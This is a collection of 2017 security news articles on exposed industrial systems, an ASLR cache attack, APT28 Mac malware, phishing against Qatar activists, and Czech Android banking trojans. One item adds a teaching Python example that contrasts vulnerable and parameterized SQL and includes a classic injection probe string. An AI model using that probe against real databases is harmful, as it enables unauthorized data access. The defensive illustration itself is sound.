The education sector is by far the most exposed, with tens of thousands of assets in Philadelphia, Seattle, Chicago, Los Angeles, Ann Arbor and Austin.

Exposed ICS devices

Trend Micro’s study also focused on exposed industrial systems. The top four most exposed ICS-specific protocols identified by researchers are MODBUS, BACnet, Ethernet/IP and Tridium’s proprietary Fox protocol.

In the case of MODBUS, a popular application layer protocol used for interacting with programmable logic controllers (PLCs), experts identified tens of instances in Fort Lauderdale, Houston, New York and Princeton. Many of these products were BMX processor modules from Schneider Electric.

Instances of BACnet, which is used for building automation and control, were identified in Houston, Chicago and Miami. A majority of the products come from Tridium and Trane.

PLCs made by Rockwell Automation’s Allen-Bradley accounted for a majority of the systems exposing Ethernet/IP.

During its research, the security firm also identified exposed human-machine interfaces (HMI). These systems had not been compromised, but being accessible from the Internet put them at risk. The exposed HMIs were associated with a milling machine, a roller press, a water treatment plant, a conveyor belt, an air-handling system, and a power converter.

Exposed HMI

Trend Micro has also conducted a separate study focusing on all popular Internet-connected devices in the U.S., including webcams, routers, NAS devices, phones, media players, and web and email servers. The largest number of exposed cyber assets were found in Los Angeles, Houston, Chicago, Dallas, Phoenix, San Jose and New York.


Researchers Break ASLR Protection via JavaScript Attack

15.2.2017 Securityweek Attack
Address space layout randomization (ASLR) protection can be broken via practical attacks using JavaScript without any specific instructions or software features, a newly published research paper claims.

According to a group of researchers from Vrije Universiteit Amsterdam in the Netherlands, ASLR is fundamentally insecure on modern cache-based architectures, although it is used as the main line of defense against memory corruption attacks. Although existing attacks against ASLR rely on software vulnerabilities or on repeated memory probing, simpler attacks are possible, the researchers claim.

In their paper (PDF), the researchers detail a new EVICT+TIME cache attack on the virtual address translation that the memory management unit (MMU) of modern processors performs. The attack, they explain, “relies on the property that the MMU’s page-table walks result in caching page-table pages in the shared last-level cache (LLC).”

Dubbed ASLR⊕Cache, or AnC, the attack allows an actor to derandomize virtual addresses of a victim’s code and data. Because the attack relies only on basic memory accesses, it can be implemented in JavaScript, and researchers demonstrate how such an implementation can break code and heap ASLR in two major browsers (Chrome and Firefox) on Linux systems.

The attack, the researchers explain, relies on the interplay between the MMU and the caches during virtual to physical address translation, a behavior critical to efficient code execution on modern CPUs. The issue, they say, is that modern architectures allow attackers with knowledge to craft memory accesses that manifest timing differences to disclose memory access and infer the bits that make up the address. These timing differences are considered fundamental, reflecting the way caches optimize accesses in the memory hierarchy, the researchers explain.

The AnC attack, the paper says, is applicable to a wide range of modern architectures, including Intel, ARM and AMD, while mitigation without naively disabling caches is hard, because it targets the low-level operations of the MMU. The researchers say that the AnC attack was possible on all of the tested architectures and that all, except for ARMv7, allowed them to fully derandomize ASLR.

The researchers also explain that an on-going AnC attack can be detected using performance counters, although this type of defense is prone to false-positives. Partitioning the shared LLC can also be used, though with performance impact, while reducing the accuracy of the timers to make it harder for attackers to differentiate between cached and memory accesses is often costly to implement. AnC can also be mitigated through caching PT entries in a separate cache rather than the data caches.

“The conclusion is that such caching behavior and strong address space randomization are mutually exclusive. Because of the importance of the caching hierarchy for the overall system performance, all fixes are likely to be too costly to be practical. Moreover, even if mitigations are possible in hardware, such as separate cache for page tables, the problems may well resurface in software. We hence recommend ASLR to no longer be trusted as a first line of defense against memory error attacks and for future defenses not to rely on it as a pivotal building block,” the paper concludes.


FireEye Becomes AV Replacement, Adds macOS Support

15.2.2017 Securityweek Apple
SAN FRANCISCO – RSA CONFERENCE 2017 - Cyber threat protection and intelligence firm FireEye today unveiled major updates to its endpoint security platform, including two new protection engines and support for Apple’s macOS systems.

The new capabilities are the first of several no-cost upgrades for FireEye Endpoint Security customers that are coming in 2017, the company says.

As part of the latest FireEye Endpoint Security platform, a new “Exploit Guard” engine leverages behavioral analysis capabilities to detect known threats, while a new partnership integrates Bitdefender’s anti-malware engine to protect against more traditional commodity malware. The combination allows FireEye Endpoint Security to serve as an Anti-Virus replacement with a single agent that can satisfy compliance requirements.

The company claims that the behavioral analysis engine powering the new Exploit Guard feature has, in testing environments, been able to detect and block nearly all the previously unknown exploits (without signatures or indicators) that were publicly reported over the past three years.

“We took every zero-day exploit that affected Windows machines from 2014, 2015 and 2016 and fed them into this engine,” FireEye CTO Grady Summers told SecurityWeek at the company’s recent internal Momentum 2017 conference. Summers, who previously served as CISO at GE, explained that FireEye pulled down all the ransomware and exploit kits they could find on Virus Total and were able to achieve a 99.74% efficacy (detection) rate with no signatures or prior knowledge.

The company boasts an advantage of continually responding to high profile breaches around the world via its Mandiant team, where incident responders and analysts are able to see where other products fail. The company says that in Q4 2016, Mandiant responded to more security breaches than in any prior quarter in the company’s history.

"Well over 80 percent of the time, if I'm reading a headline, we are there," Kevin Mandia, CEO at FireEye, told SecurityWeek in a meeting at the Momentum Conference last month. "That makes me feel good."

“At FireEye, our security innovation begins at the breach. Because we own that moment, we get to witness firsthand how attackers evade other security safeguards – including 'next gen' endpoint – and this allows us to innovate at the speed of attackers,” Kara Wilson, Chief Marketing Officer at FireEye, wrote in a blog post.

In addition to insights gained from the Mandiant Incident Response team, context from FireEye iSIGHT Intelligence helps security teams prioritize and triage threats, the company says.

“FireEye Endpoint Security is built to speed up and simplify endpoint protection and response with high-fidelity alerts, context from FireEye iSIGHT Intelligence, and forensic and investigation capabilities scaled to hundreds of thousands of endpoints,” the company explains. “This seamless integration of prevention, detection and response capabilities in a single agent also greatly simplifies the customer deployment and lowers the performance impact on the endpoint.”

These new capabilities are generally available to customers globally immediately.

The integration of Bitdefender's anti-virus engine is expected to occur during the first quarter of 2017, with additional roll-out of other detection and prevention capabilities following later this year.

In addition to the recently added support for macOS endpoints, support for Linux servers will be added later in 2017. Other enhancements coming this year will include virtual and cloud form factors and expanded behavioral analysis and machine learning capabilities to protect against unknown malware and exploits.

After seeing its stock price decline significantly in recent years, along with major executive leadership changes, FireEye is betting on new products and partnerships to help improve its position in the cybersecurity solutions market.

In late 2016, FireEye launched new cloud-based network security and threat intelligence offerings. The company also announced a deal with Microsoft that allows Windows Defender Advanced Threat Protection (WDATP) users to gain access to FireEye's iSIGHT adversary based intelligence.

In November 2016 the company unveiled FireEye Helix, a new platform designed to help customers efficiently integrate and automate security operations functions and accelerate incident response.

In December 2016, FireEye and the NATO Communications and Information Agency (NCI) announced an information sharing partnership, under which the two organizations will exchange non-classified technical information related to cyber threats and vulnerabilities.

“The investments we are making in 2017 for our customers in Endpoint Security are significant, as it is a core component of the FireEye Helix platform and a huge opportunity for our business,” Mandia said in a statement.


Cyber Skills Shortage May Require Employers to Change Course: Report

15.2.2017 Securityweek Cyber
The cyber security skills gap is known and documented, and empirically understood by all enterprise security leaders. It was recently quantified by job site Indeed.com, which measured the difference between available positions and market interest in them. A new report from ISACA titled Current Trends in Workforce Development (PDF) now seeks to understand the shortcomings in the available applicants, and what can be done by enterprises to minimize the effect of skills shortage.

The report is the first released part of ISACA's State of Cyber Security 2017 survey. 633 ISACA members responded to an online questionnaire, representing more than 20 industries and all five major geographical regions. North America and Eurasia provided 85% of the respondents in almost equal measure. Technology services at 28%, and finance/banking at 23% provided more than half of the total industry sectors.

The effect of the skills shortage is severe, with more than 25% of enterprises taking more than 6 months to fill a security vacancy. Only 59 percent of the organizations say they receive at least five applications for each cyber security opening, and only 13 percent receive 20 or more. This compares to the 60 to 250 applications for the majority of non-security job openings.

The survey finds that the "main problem of obtaining key talent in the realm of cyber security stems from a lack of qualified applicants." This is a serious issue that goes beyond the trivial chicken and egg explanation. Cyber security is such a rapidly evolving area that new skills are required almost as soon as schools and colleges begin to train for old requirements.

Threat hunting analysts are a prime example. All security technologies generate huge logs. Those logs contain, somewhere, the subtle indications of system compromise. But it requires a human analyst with a particular set of skills to be able to hunt through a myriad of log alerts to be able to detect the few genuine issues from a mass of false positives.

This is a relatively new development in cyber security. It stems from the rapidly growing use of AI and machine-learning algorithms designed to detect anomalies. They work on the basis of a probability score rather than a binary malicious/not malicious decision. A human analyst is required to make the final decision on the probable, and third-party threat-hunting training is in short supply.

Even when trained threat hunters enter the marketplace, they will do so without practical experience. However, more than half (55%) of the respondents report that practical, hands-on experience is the most important cyber security qualification. Employers are simply demanding the impossible: anybody already possessing both qualifications and experience has got that experience by being in employment. It becomes a question of poaching rather than recruiting, with the inevitable result that skills move upwards towards the bigger and better financed enterprises, magnifying the problem for small and medium companies without doing anything to solve the basic problem.

Even within the low number of applicants, 25% of respondents say today's cyber security candidates are lacking in technical skills; while 45% do not believe most applicants understand the business of cyber security.

ISACA offers several recommendations to help employers find, assess and retain qualified cyber security talent. In locating talent, it suggests looking internally, and/or looking in a different direction externally. Internally, it suggests that employers should "Groom employees with tangential skills -- such as application specialists and network specialists -- to move into cyber security positions." This solves the technical skills problem (these employees will already possess them) while experience can be gained 'on the job'.

Externally it recommends a path already taken by many organizations: engage with and cultivate students and career changers. "An outreach program to a university or an internship program can help with this," it says.

ISACA also recommends automation wherever possible. "Where security operational tasks can be automated, it can decrease the overall burden on staff and thereby help make best use of the staff that an organization already has."

The ISACA report will be discussed at the RSA Conference, on Thursday, February 16th. A CISO panel including four ISACA leaders will discuss "State of Cybersecurity: Overcome Workforce Challenges, Build a Skilled Team."


Russian Black Hat Hacks 60 Universities, Government Agencies

15.2.2017 Securityweek Cyber
A Russian-speaking black hat hacker has breached the systems of more than 60 universities and U.S. government agencies, according to threat intelligence firm Recorded Future.

The hacker, tracked by the company as “Rasputin,” typically exploits SQL injection vulnerabilities to gain access to sensitive information that he can sell on cybercrime marketplaces.

Rasputin is the hacker who last year breached the systems of the U.S. Election Assistance Commission (EAC) and attempted to sell more than 100 access credentials, including ones providing administrator privileges. Researchers found evidence that he had been negotiating with a potential buyer representing a Middle Eastern government.

Recorded Future has been monitoring the hacker’s activities and identified many of his victims, including over two dozen universities in the United States, ten universities in the United Kingdom, and many U.S. government agencies.

The list of targeted government agencies includes local, state and federal organizations. The targeted federal agencies are the Postal Regulatory Commission, the Department of Housing and Urban Development, the Health Resources and Services Administration, and the National Oceanic and Atmospheric Administration.

US organizations targeted by Rasputin

There are plenty of free tools that can be used to find and exploit SQL injection vulnerabilities, including Havij, Ashiyane SQL Scanner, SQL Exploiter Pro, SQLI Hunter, SQL Inject Me, SQLmap and SQLSentinel. However, Rasputin has been using a SQL injection tool that he developed himself.

“Financial profits motivate actors like Rasputin, who have technical skills to create their own tools to outperform the competition in both identifying and exploiting vulnerable databases,” said Levi Gundert, VP of intelligence and strategy at Recorded Future.

Experts believe Rasputin picks his targets based on their perceived investment in security controls and the potential value of the stolen data. The personal information stored in the targeted organizations’ databases can be highly valuable, particularly if the data is associated with users in North America and Western Europe.

Recorded Future pointed out that while SQL injection vulnerabilities have been around for a long time and can be easily prevented through basic secure coding practices, addressing these types of flaws can often be costly.

“The problem and solution are well understood, but solutions may require expensive projects to improve or replace vulnerable systems. These projects are often postponed until time and/or budget is available, until it’s too late to prevent SQLi victimization,” said Gundert.
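Gundert's point that SQL injection is "well understood" and preventable with basic secure coding is shown below in an added example (not code from Recorded Future or the article): the string-spliced query that lets a quote in the input change the query's structure, the parameterized form that does not, and a crude code-review heuristic for spotting the first pattern. The table, the probe string and the sample source lines are all constructed for the example.

```python
import re
import sqlite3

# Constructed in-memory table standing in for a university records database;
# every value is invented for the example, not data from any breach.
def build_sample_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE students (id INTEGER, email TEXT, ssn_last4 TEXT)")
    conn.executemany("INSERT INTO students VALUES (?, ?, ?)", [
        (1, "alice@example.edu", "1234"),
        (2, "bob@example.edu", "5678"),
        (3, "carol@example.edu", "9012"),
    ])
    return conn

def lookup_vulnerable(conn, email):
    """The defect: untrusted input is spliced into the SQL text, so a quote
    in the input changes the query's structure instead of its data."""
    sql = "SELECT id, email FROM students WHERE email = '%s'" % email
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, email):
    """The fix: the value is bound to a placeholder and is never parsed as
    SQL, whatever characters it contains."""
    sql = "SELECT id, email FROM students WHERE email = ?"
    return conn.execute(sql, (email,)).fetchall()

# Constructed probe: the textbook tautology. Concatenated, the WHERE clause
# becomes  email = 'x' OR '1'='1'  and matches every row.
CONSTRUCTED_PROBE = "x' OR '1'='1"

# Lightweight review heuristic: a line containing a SQL verb together with a
# formatting or concatenation operator. It catches lookup_vulnerable above;
# it is a review aid, not a proof of safety.
SQL_VERB_RE = re.compile(r"\b(SELECT|INSERT|UPDATE|DELETE)\b", re.IGNORECASE)
FORMATTING_RE = re.compile(r"""%\s*[\w(]|\+\s*\w|\.format\(|\bf["']""")

def flag_string_built_sql(lines):
    """Return 1-based numbers of source lines that look like SQL assembled
    with string formatting or concatenation."""
    return [n for n, line in enumerate(lines, 1)
            if SQL_VERB_RE.search(line) and FORMATTING_RE.search(line)]

# Constructed source lines for the review heuristic.
SAMPLE_SOURCE = [
    "sql = \"SELECT * FROM users WHERE name = '%s'\" % name",
    'cur.execute("SELECT * FROM users WHERE name = ?", (name,))',
    'q = f"DELETE FROM sessions WHERE id = {sid}"',
    'cur.execute("SELECT 1")',
]

if __name__ == "__main__":
    db = build_sample_db()
    print("vulnerable:   ", lookup_vulnerable(db, CONSTRUCTED_PROBE))
    print("parameterized:", lookup_parameterized(db, CONSTRUCTED_PROBE))
    print("flagged lines:", flag_string_built_sql(SAMPLE_SOURCE))
```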


CrowdStrike Sues NSS Labs to Prevent Publication of Test Results

15.2.2017 securityweek Security

CrowdStrike filed suit against NSS Labs

On February 10, 2017, next-gen endpoint protection firm CrowdStrike filed suit against security product testing firm NSS Labs, and sought a temporary restraining order to prevent publication of CrowdStrike comparative test results. On February 13, the injunction was denied by the District Court of Delaware. On February 14, NSS published the results as part of its Advanced Endpoint Protection Group Test Results.

CrowdStrike explained the background in a blog post yesterday. It filed suit, it said, to hold NSS "accountable for unlawfully accessing our software, breaching our contract, pirating our software, and improper security testing. Regardless of test results (which we have not seen), CrowdStrike is making a stand against what we believe to be unlawful conduct."

CrowdStrike had earlier commissioned NSS to undertake a private test of its products, but was dissatisfied with the test methods, calling them "deeply flawed". Because of this it decided not to participate in the subsequent public test, and prohibited NSS from using its software. But according to CrowdStrike, NSS "colluded with a reseller and engaged in a sham transaction to access our software to conduct the testing. In doing so, NSS breached their contract with CrowdStrike, violated our end user licensing agreement (EULA), misappropriated our intellectual property, and improperly used credentials. Once we became aware that an unauthorized user account associated with a reseller was used for the tests, we suspended access immediately. Any test results that NSS did obtain are incomplete and materially flawed."

Product testing has long been a problem for the newer endpoint protection companies. In June 2016, Sophos blasted Cylance, and added, "when the playing field is leveled, and Cylance's product comes under real scrutiny, the company cries foul, puts the fear of lawsuits into the minds of its partners, and accuses others of 'smoke and mirrors' tactics."

Now the threat of a lawsuit has become a reality between CrowdStrike and NSS Labs. In the meantime, many of the new endpoint protection companies, including Cylance, have modified their attitudes. Cylance was amongst the tested products, as was SentinelOne and Invincea. These last three did rather well in the overall scores: Cylance at 99.69%, SentinelOne at 99.79%, and Invincea at 99.49%. CrowdStrike did less well at 74.17% -- but as CrowdStrike claimed, the results 'are incomplete'; and as NSS Labs admits, "The Falcon Host's final rating may have been different had it completed the test."

There are two primary issues here: is it possible to conduct fair comparative tests for advanced endpoint protection products (aka, machine-learning or next-gen AV); and is the law a valid method of preventing them?

Opinions differ on the first. David Harley blogged in WeLiveSecurity on Monday (although I understand it was written well before this current issue): Next-gen security software: 'Myths and marketing'. Quoting a question I asked him months ago (basically, is there any way to compare 1st- and 2nd-gen AV products), he said, "yes, of course there is."

Vesselin Bontchev, who is possibly the ultimate culprit ("I practically invented independent competent anti-virus testing while I was working at the Virus Test Center at the University of Hamburg in the early '90s") takes the opposite view. He believes that neither products nor testing are anywhere near as competent as they should be. "Whenever there is a major conflict, like this CrowdStrike vs NSS Labs story," he wrote yesterday, "you can usually bet that both sides are in the wrong. CrowdStrike probably have a crappy product they want to sell and didn't like the test results, while NSS Labs probably has a crappy and/or incomplete testing methodology and CrowdStrike found some legitimate flaws in it."

The law, however, is a heavy instrument to prevent public testing. SecurityWeek asked NSS to comment, and was told via email by CEO Vikram Phatak, "While CrowdStrike's request for a Temporary Restraining Order and Preliminary Injunction were denied by the Federal court, they are still suing us at present, and so we are limited in what we can say. Whether or not it is their intent, their suit has the effect of keeping us from debating the facts publicly.

"We obviously disagree and are disappointed with CrowdStrike's characterization of NSS as portrayed in their recent blog post... And as far as Crowdstrike's suit against NSS, we believe the judge's ruling and memorandum speak for themselves."

SecurityWeek also approached CrowdStrike, the Anti-Malware Testing Standards Organization (of which both CrowdStrike and NSS Labs are members), and another independent test lab for comments. We have so far received no response (although an informal reply from CrowdStrike did say, "Things are moving quickly today. Keep an eye on your inbox for an update"). If any comments are received they will be added as an update to this post.

Meanwhile, customers are left with an ongoing problem: can test results be trusted? There is no easy answer to this. The best solution is for customers to insist on an on-site trial period to see whether a preferred solution is actually up to the job.


Amnesty Warns of Phishing Attacks on Qatar Activists

15.2.2017 securityweek Phishing

Human rights watchdog Amnesty International has uncovered a sophisticated phishing campaign targeting journalists, activists and other entities in Nepal and Qatar interested in migrants' rights.

The campaign, dubbed Operation Kingphish, involves an online persona named “Safeena Malik” – Malik can mean “king” in Arabic. Amnesty International learned that Safeena Malik had contacted several individuals via email and social media over the course of 2016.

Safeena Malik, who claimed to be an activist interested in human rights, had accounts on several social media websites, including Twitter, Facebook and LinkedIn. “She” reached out to dozens of people, many involved in the issue of migrants’ rights in Qatar.

Safeena Malik fake profile

Qatar has attracted the attention of several human and labor rights organizations for its exploitation of migrant workers, many of whom are from Nepal. Some of the documented cases are related to the construction of stadiums and infrastructure for the FIFA World Cup competition that will be hosted by Qatar in 2022.

According to Amnesty, many of the attacks launched using the fake Safeena Malik profiles attempted to lure targeted individuals to realistic Google phishing pages. In order to avoid raising suspicion, the phishing pages displayed the email address and profile picture of the targeted user, and a legitimate document was displayed once the password had been handed over to the attacker.

Documents on human trafficking and ISIS funding, and fake Google Hangouts invitations were used to lure targeted users to the phishing pages. Safeena Malik also sent out private messages on Facebook to obtain the Gmail addresses of the targets.

The persona had hundreds of connections on social media and often joined groups focusing on migrant workers and forced labor in an effort to identify potential targets and make it appear as if “she” was part of the community.

Amnesty identified 30 different targets by analyzing the profile pictures hosted on the server used by the attacker to deliver the phishing pages, although the organization believes the actual number is much higher.

“Most identified targets were activists, journalists, and labour union members. While some of targets had published critical opinions about Qatar’s international affairs, the majority of identified targets were affiliated with organisations supporting migrant workers in Qatar,” said activist and security researcher Claudio Guarnieri. “Interestingly, a significant number of them are from Nepal, which is one of the largest nationalities amongst migrant workers in Qatar, and a country that has featured prominently in the migrant worker narrative on Qatar.”

While experts could not find too much evidence, they believe the attacks were likely carried out by a state-sponsored actor. One of the IP addresses used to access some of the compromised email accounts had been associated with an ISP headquartered in Doha, Qatar.

However, when contacted by Amnesty, the government of Qatar denied any involvement and expressed interest in stopping the attacks. Experts pointed out that the operation could be the work of an actor that seeks to damage Qatar’s reputation.

This is not the only social engineering campaign targeting human and labor rights organizations focusing on the situation in Qatar. In December, Amnesty International published a report detailing a fake human rights organization named Voiceless Victims. It is unclear if the two campaigns are directly connected.


Websites Can Now Track You Online Across Multiple Web Browsers
15.2.2017 thehackernews Security

You might be aware of websites, banks, retailers, and advertisers tracking your online activities using different Web "fingerprinting" techniques even in incognito/private mode, but now sites can track you anywhere online — even if you switch browsers.
A team of researchers has recently developed a cross-browser fingerprinting technique — the first reliable technique to accurately track users across multiple browsers based on information like extensions, plugins, time zone and whether or not an ad blocker is installed.
Previous fingerprinting methods usually only work across a single browser, but the new method uses operating system and hardware level features and works across multiple browsers.
This new fingerprinting technique ties the digital fingerprint left behind by a Firefox browser to the fingerprint from a Chrome browser or Windows Edge running on the same device.
This makes the method particularly useful to advertisers, enabling them to continue serving targeted advertisements to online users, even if they avoid them by switching browsers.
The new technique can be found in a research paper titled (Cross-)Browser Fingerprinting via OS and Hardware Level Features [PDF] by Lehigh University’s Yinzhi Cao and Song Li, and Washington University in St. Louis’ Erik Wijmans.
The cross-browser fingerprinting technique relies on "many novel OS and hardware features, especially computer graphics ones" that are slightly different for each computer.
For example, the technology can be used to identify the machine by performing 20 unique WebGL tasks while rendering 3D graphics in web browsers with carefully selected computer graphics parameters, such as texture, anti-aliasing, light, and transparency.
In total, 36 new features are used; they are tied to the machine rather than to any one specific web browser on it, so they work independently of the browser in use.
The features tested currently include time zone, number of CPU cores, GPU, hash values of GPU rendering results, plugins, fonts, audio, screen ratio and depth, WebGL, ad blocking, canvas, cookies, encoding, and language.
The researchers provided both a practical demonstration as well as open source code online on GitHub. They performed a test which involved 3,615 fingerprints and 1,903 users and found that their method successfully identified 99.2% of users.
On the other hand, a single-browser fingerprinting technique called AmIUnique had a success rate of 90.8%.
"This approach is lightweight, but we need to find all possible fingerprintable places, such as canvas and audio context: If one place is missing, the browser can still be somehow fingerprinted. We leave it as our future work to explore the correct virtualization layer," the paper notes.
The researchers also noted that this new cross-browser fingerprinting technique is not purely harmful: in some cases it can be used as part of stronger multi-factor user authentication across multiple browsers.
For example, banks can use this technique to check whether a user logging into an online account is using the computer that has been used on every previous visit, making sure the login was legitimate even if the user is using a different machine than usual.
The researchers plan to present their paper at the Network and Distributed System Security Symposium scheduled for February 26 through March 1 in San Diego, California.


Russian Cyberspies Use New Mac Malware to Steal Data

15.2.2017 securityweek Apple 
Researchers have discovered a new piece of malware used by the Russia-linked threat group known as APT28 to steal sensitive data from Mac devices, including backups and passwords.

APT28 is also tracked as Fancy Bear, Pawn Storm, Sofacy, Tsar Team, Strontium and Sednit. The threat actor has been linked to several high-profile attacks aimed at government and other types of organizations around the world, including the recent election-related hacker attacks in the United States.

APT28 has been known for using an OS X downloader named Komplex, and researchers from Bitdefender and Palo Alto Networks have now come across another Mac malware believed to be part of the group’s arsenal.

XAgent, or X-Agent, is a Trojan used by APT28 in attacks targeting Windows systems. A recently analyzed campaign aimed at Ukraine indicates that the group may have also developed an Android version of XAgent.

Bitdefender and Palo Alto Networks have also identified a macOS version of XAgent, which they believe is downloaded to targeted systems by the Komplex downloader. Both security firms determined, based on binary strings, that Komplex and XAgent were likely created by the same developer.

Once it infects a Mac computer, the malware, which its authors call XAgentOSX, contacts a command and control (C&C) server and waits for instructions. C&C communications are similar to the ones used by the Windows version of XAgent.

XAgentOSX can collect information about the system, running processes and installed applications, it can download and upload files, execute commands and files, and take screenshots.

The malware also looks for backup files from an iPhone or iPad, which it can exfiltrate using one of the available commands. XAgentOSX can also log keystrokes, allowing the attackers to obtain the victim’s credentials.

Bitdefender told SecurityWeek that it does not have any information on XAgentOSX infections and targets, but the company believes the victims are hand-picked in an effort to prevent the exposure of malware samples.

“Most likely, this sample is directed at the same audience that makes the focus of the APT28 group (government, airspace, telecom and, e-crime services). It most likely covers the instances in which targets in the respective groups use Macs as work or personal computers,” said Bogdan Botezatu, Senior E-Threat Analyst at Bitdefender.

APT28 is a sophisticated threat group whose arsenal includes a wide range of tools, including Linux malware. One of the actor’s favorite Linux tools is Fysbis, an unsophisticated yet efficient backdoor.


Signal introduced the Video call feature in public beta release
15.2.2017 securityaffairs Apple  

Signal, the most secure instant messaging app, introduced the video call feature in a public beta release. You can test it now!
Signal is considered the most secure instant messaging app; searching for it on the Internet, it is possible to read Edward Snowden’s testimony:

“Use anything by Open Whisper Systems,” Snowden says.
The cryptographer and Johns Hopkins University professor Matt Green and the popular security expert Bruce Schneier are two other admirers of the Signal app.

News of the day is that the Signal app released video calling feature on Tuesday for both Android and iOS.

The new feature will allow Signal users to talk face-to-face through video calling, with a specific focus on security.

The Signal video calling feature implements the support for CallKit on iOS 10 devices, a recently introduced framework that lets users’ VoIP app integrate tightly with the native Phone UI.


The Callkit in iOS 10 allows Signal users to answer calls just like regular calls, but there are some specific privacy issues that must be carefully considered.

“CallKit offers a native calling experience to VoIP apps like Signal. As well as being able to answer calls directly from your lock screen, you’ll also see Signal calls in the system’s “Recent Calls” list. This is because iOS treats CallKit calls like any other call, however that also means some information will be synced to iCloud if enabled. This information includes who you called and how long you talked.” wrote Moxie Marlinspike.

CallKit can be disabled by Signal iOS users to enhance their privacy.

The Signal’s video calling feature is still in beta, in order to make a video call both users will have to enable the feature.

If you want to try the new feature, go into your Signal settings and enable ‘Video calling beta’ under ‘Advanced.’

“If you decide that’s not for you, you can opt-out of the CallKit features at any time in Settings > Advanced > Use CallKit, while continuing to use the rest of the new calling system.” continues Moxie Marlinspike.


Operation Kingphish: Cyber Attacks against human rights activists in Qatar and Nepal
15.2.2017 securityaffairs Cyber  

Amnesty International has recently uncovered a spear phishing campaign dubbed Operation Kingphish that targeted groups in Qatar and Nepal.
Human rights organizations and journalists continue to be a privileged target of phishing campaigns that attempt to steal the Google credentials of the victims. The malicious messages try to lure victims into viewing documents online.

Amnesty International has recently uncovered a spear phishing campaign that targeted groups in Qatar and Nepal leveraging a fake social media profile, the attackers did not directly hit people working for Amnesty International.

The threat actor created a fictional rights activist named Safeena Malik.

Amnesty International dubbed the phishing campaign ‘Operation Kingphish’ because the surname “Malik” translates from Arabic as “King.”

“Over the course of 2016 — and particularly intensifying towards the end of the year — several individuals known to Amnesty International were approached via email and through social media by “Safeena Malik”, seemingly an enthusiastic activist with a strong interest in human rights.” reads a blog post published by popular researcher Claudio Guarnieri on Medium. “What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists, human rights defenders, trade unions and labour rights activists, many of whom are seemingly involved in the issue of migrants’ rights in Qatar and Nepal.”

The threat actors created profiles for the character “Safeena Malik” on every social media, including Facebook, Google, LinkedIn, and Twitter. The information used by the attackers seems to have been harvested from another social media account.

“The various social media accounts communicated regularly with several of the victims we identified, often for many months. It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile, along with a professional biography also stolen from yet another person.” added Claudio Guarnieri.

Among the various profiles created for Safeena Malik, the most active appear to be the Facebook and LinkedIn ones (where the identity had accumulated more than 500 connections).

The LinkedIn profile has built a network composed of more than 500 connections. The attackers targeted individuals associated with the rights of migrant workers in Qatar, journalists, activists, and labor union officials.

A large number of workers from Nepal and other countries have been brought to Qatar to work with companies involved in the construction of stadiums and facilities for the 2022 World Cup, so human rights activists are concerned over the treatment of those workers. It has been estimated that more than 1,200 migrant workers from Nepal and India have already died.

Victims of the spear phishing campaign received malicious email and social media messages from “Safeena Malik,” who was asking them to view the content of documents or presentations on Qatari human rights issues.

Operation Kingphish

In other cases, the attackers were offering forged requests to link up via Google’s Hangouts chat service.

The phishing messages included links to a phishing site crafted specifically to trick visitors into providing their Google login credentials. Once the victims provided the credentials, they were redirected to an actual Google Docs document pilfered from another source to avoid suspicion.

Who is behind the Operation Kingphish?

“In the absence of clear evidence, trying to identify the entity behind this attack can only be speculative.” states Guarnieri.

Despite the lack of conclusive evidence, the fact that the spear phishing attacks specifically target individuals active on human rights issues in Qatar suggests the involvement of a state-sponsored actor.

“We believe it is also possible that these attacks have been orchestrated by contractors.” concluded Guarnieri.

The Qatari government has denied involvement in the Operation Kingphish campaign.


Another wave of malware is targeting Czech Android users. What can the Android/Spy.Banker.HO virus do?
15.2.2017 Živě.cz Android

Another wave of fake apps has arrived in the Czech Republic, this time posing as DHL
Their goal is to steal online banking login credentials
How to defend against these scams?
Since at least mid-January we have been coming across several warnings every week about a malicious Android application that attackers distribute via SMS. Most often they send messages posing as one of the Czech banks, but Česká pošta (the Czech Post) and the e-shop Alza have not escaped the problem either, and the latest case concerns the shipping company DHL.

The attack pattern is always the same: the user receives an SMS with text relating to the given company and a request to download an application. Fake messages from Česká pošta thus contained a prompt to pick up a parcel at a depot; with banks the attackers most often use the variant of an important notice that is to be read in the linked application; with Alza they promise a prize; and with DHL the app offers to change the delivery address for a parcel.

Two apps, the same malware. One poses as the Česká pošta app, the other as DHL, but in most cases it bears the name Flash Player 10 Update

The first distinguishing feature of a fraudulent app can be the address from which it is to be downloaded. So far the attackers have always used the .online domain: for Alza it was http://alza-shop.online, for DHL it is now http://dhl-express.online, and for the post office the attackers used the appealing address http://ceskaposta.online. Thanks to these URLs, the messages may appear legitimate to many users.

This is what a fraudulent message can look like; this one specifically poses as Česká pošta (photo: @TerezaChlubna)

Another common feature of these fraudulent apps is their minimal size. The APK installation package is always under 1 MB when downloaded, and after installation the size of all the mentioned versions was around 1.4 MB. On launch the app of course requests all permissions in the system, and if the user grants them, the app gains not only access to contacts but also, for example, the ability to read and send messages.

The app requests complete system permissions, thanks to which it can later get at, for example, the verification SMS for logging into online banking

The basic defense against this type of attack should above all be vigilance and common sense. If the user is not expecting a parcel from Česká pošta or DHL, or receives a message from a bank where they are not a customer, fraud is the most likely explanation. A message from Alza promising a prize for installing an app can be harder to judge, since some companies might genuinely promote their apps in similar ways. For all variants, however, the basic rule should apply: do not install apps from unknown sources and rely on the built-in Google Play store.

Fake banking

If the user installs the app, it runs in the background and waits for its opportunity to serve up a fraudulent login form for online banking. This can happen not only when the fraudulent app itself is launched, but also when other services are started. One variant of the Android/Spy.Banker malware displayed a form for entering payment details every time one of the messengers was launched: Skype, Facebook Messenger, Hangouts, but also social networks such as Instagram or Twitter.

The app can also display forms for entering payment card details (photo: Fortinet)

In our country, however, users will mainly encounter a localized variant adapted for Czech users. In the case of the latest attack, which uses the name of the carrier DHL, it is pure phishing: after the app is opened, a login form for ČSOB online banking is displayed. If the user enters their identification number and PIN code, the attackers have an easy job. Thanks to the granted permission to read messages, they also have access to any verification SMS.

If the user launches the app, it serves up a login form for online banking. It already has access to the verification SMS as well, and once the credentials are entered nothing stops it from taking over the account (photo: ČSOB)

Currently the Android/Spy.Banker trojan threatens mainly Eastern Europe, which is also visible on Eset's map. It had already spread last autumn, however, when in its original form it was used to steal online banking credentials in Germany, France and Austria, and to a lesser extent in Poland and the United States.

